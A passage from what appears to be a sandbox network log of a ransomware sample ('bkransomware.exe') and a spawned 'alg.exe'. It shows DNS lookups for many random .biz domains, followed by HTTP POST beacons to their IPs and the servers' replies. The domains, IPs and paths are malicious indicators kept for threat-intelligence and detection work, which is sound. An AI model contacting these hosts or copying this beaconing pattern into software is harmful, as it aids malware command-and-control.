User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=48075040ce1cc53bb53ea581eb1a48e5|194.110.13.70|1723257666|1723257666|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

deoci.biz

alg.exe

Remote address:

8.8.8.8:53

Request

deoci.biz

IN A

Response

deoci.biz

IN A

18.208.156.248
DNS

vcddkls.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vcddkls.biz

IN A

Response

vcddkls.biz

IN A

18.141.10.107
POST

http://deoci.biz/rafbrexontksjth

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /rafbrexontksjth HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b5d40e17baa00aba87dea92c5ba951e4|194.110.13.70|1723257666|1723257666|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://vcddkls.biz/njwq

alg.exe

Remote address:

18.141.10.107:80

Request

POST /njwq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6d0827e5237cc98f8aa0cd0a390bdf97|194.110.13.70|1723257667|1723257667|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gytujflc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
DNS

160.200.246.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

160.200.246.34.in-addr.arpa

IN PTR

Response

160.200.246.34.in-addr.arpa

IN PTR

ec2-34-246-200-160 eu-west-1compute amazonawscom
DNS

248.156.208.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

248.156.208.18.in-addr.arpa

IN PTR

Response

248.156.208.18.in-addr.arpa

IN PTR

ec2-18-208-156-248 compute-1 amazonawscom
POST

http://gytujflc.biz/jmmjwqredi

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /jmmjwqredi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:06 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gytujflc.biz/fpuvoedfholdfds

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /fpuvoedfholdfds HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:06 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/hckibafbv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /hckibafbv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:11 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/rhuhxxlslfjyrwd

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /rhuhxxlslfjyrwd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:11 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/xtwfv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /xtwfv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:45 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/wkhdhutcptwaqv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

208.100.26.245:80

Request

POST /wkhdhutcptwaqv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:45 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
DNS

qaynky.biz

alg.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
POST

http://qaynky.biz/paik

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /paik HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2bb3b8324ce82c99f83ae3b3e9e42be9|194.110.13.70|1723257667|1723257667|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fwiwk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN A

172.234.222.143

fwiwk.biz

IN A

172.234.222.138
POST

http://fwiwk.biz/dsowokpmderaai

alg.exe

Remote address:

172.234.222.143:80

Request

POST /dsowokpmderaai HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
DNS

245.26.100.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.26.100.208.in-addr.arpa

IN PTR

Response

245.26.100.208.in-addr.arpa

IN PTR

ip245 208-100-26staticsteadfastdnsnet
POST

http://fwiwk.biz/yvw

alg.exe

Remote address:

172.234.222.143:80

Request

POST /yvw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
DNS

tbjrpv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
POST

http://tbjrpv.biz/awb

alg.exe

Remote address:

34.246.200.160:80

Request

POST /awb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=351e773ba1d599c815dfdc2de9ec2fd8|194.110.13.70|1723257668|1723257668|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bumxkqgxu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

bumxkqgxu.biz

IN A

Response

bumxkqgxu.biz

IN A

44.221.84.105
POST

http://bumxkqgxu.biz/oyv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /oyv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=942bafca821c9eafdd9edeb43612f999|194.110.13.70|1723257668|1723257668|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

deoci.biz

alg.exe

Remote address:

8.8.8.8:53

Request

deoci.biz

IN A

Response

deoci.biz

IN A

18.208.156.248
POST

http://deoci.biz/x

alg.exe

Remote address:

18.208.156.248:80

Request

POST /x HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f07057487daa69203775820184cbc608|194.110.13.70|1723257668|1723257668|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dwrqljrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

54.244.188.177
POST

http://dwrqljrr.biz/gkdghdqowbglwt

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /gkdghdqowbglwt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=757328710d60f8545b18f8650ae7ec8c|194.110.13.70|1723257668|1723257668|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gytujflc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
POST

http://gytujflc.biz/kxitualufpr

alg.exe

Remote address:

208.100.26.245:80

Request

POST /kxitualufpr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:08 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gytujflc.biz/plttcyqwrmvn

alg.exe

Remote address:

208.100.26.245:80

Request

POST /plttcyqwrmvn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:09 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/evfpfqigqqwkkpv

alg.exe

Remote address:

208.100.26.245:80

Request

POST /evfpfqigqqwkkpv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:13 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/cikdstvnyfhg

alg.exe

Remote address:

208.100.26.245:80

Request

POST /cikdstvnyfhg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:13 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/lqlqjckxmtpne

alg.exe

Remote address:

208.100.26.245:80

Request

POST /lqlqjckxmtpne HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:38 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/bvlimahcko

alg.exe

Remote address:

208.100.26.245:80

Request

POST /bvlimahcko HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Aug 2024 02:41:39 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
DNS

nqwjmb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
DNS

qaynky.biz

alg.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
POST

http://nqwjmb.biz/pgxepktabqwlsi

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

35.164.78.200:80

Request

POST /pgxepktabqwlsi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fddfa4aaf0cbb62a0a9070e7d00e6aa1|194.110.13.70|1723257669|1723257669|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://qaynky.biz/yo

alg.exe

Remote address:

13.251.16.150:80

Request

POST /yo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9fc2ddaf57b30b4ee209540ddab731e7|194.110.13.70|1723257669|1723257669|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ytctnunms.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
POST

http://ytctnunms.biz/rdlcfrplmmnsn

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

3.94.10.34:80

Request

POST /rdlcfrplmmnsn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f3310848ee2cc12a6bac4dd604a94885|194.110.13.70|1723257669|1723257669|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

myups.biz

alg.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.13.20

myups.biz

IN A

165.160.15.20
POST

http://myups.biz/evrholb

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

165.160.13.20:80

Request

POST /evrholb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Date: Sat, 10 Aug 2024 02:41:10 GMT
Content-Length: 94
POST

http://myups.biz/cdgq

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

165.160.13.20:80

Request

POST /cdgq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Date: Sat, 10 Aug 2024 02:41:10 GMT
Content-Length: 94
DNS

bumxkqgxu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

bumxkqgxu.biz

IN A

Response

bumxkqgxu.biz

IN A

44.221.84.105
POST

http://bumxkqgxu.biz/jh

alg.exe

Remote address:

44.221.84.105:80

Request

POST /jh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6cbe79b38423212292a7d74401fcb8ec|194.110.13.70|1723257670|1723257670|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dwrqljrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

54.244.188.177
POST

http://dwrqljrr.biz/paospdfemlfr

alg.exe

Remote address:

54.244.188.177:80

Request

POST /paospdfemlfr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a997087dbe363e9fc413236c66779490|194.110.13.70|1723257670|1723257670|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

oshhkdluh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

oshhkdluh.biz

IN A

Response

oshhkdluh.biz

IN A

54.244.188.177
DNS

200.78.164.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.78.164.35.in-addr.arpa

IN PTR

Response

200.78.164.35.in-addr.arpa

IN PTR

ec2-35-164-78-200 us-west-2compute amazonawscom
DNS

34.10.94.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.10.94.3.in-addr.arpa

IN PTR

Response

34.10.94.3.in-addr.arpa

IN PTR

ec2-3-94-10-34 compute-1 amazonawscom
DNS

20.13.160.165.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.13.160.165.in-addr.arpa

IN PTR

Response
POST

http://oshhkdluh.biz/dwxn

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /dwxn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bc8c719e72b6fd12e141bd5d257cacd0|194.110.13.70|1723257671|1723257671|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nqwjmb.biz

